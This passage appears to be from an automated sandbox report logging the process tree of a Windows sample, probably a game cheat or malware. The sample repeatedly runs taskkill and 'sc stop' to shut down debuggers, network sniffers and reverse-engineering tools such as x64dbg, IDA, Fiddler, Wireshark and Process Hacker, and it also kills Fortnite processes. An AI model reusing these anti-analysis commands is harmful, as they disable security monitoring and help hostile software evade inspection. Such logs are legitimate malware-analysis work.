    3⤵
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3816
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4984
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4616
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3524
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:900
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:492
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2704
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:884
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:5044
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:4536
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4576
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:3928
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3976
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:1344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:5096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3984
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:544
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1704
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2788
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3676
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:776
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2864
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    - Kills process with taskkill
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:1268
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:632
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:3952
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2028
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1492
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2756
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4392
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3248
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2476
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3328
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1356
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3324
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2152
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1724
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3952
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1820
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4060
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3244
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2252
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:1048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2948
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:524
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2960
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2168
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4352
- C:\Windows\system32\cmd.exe
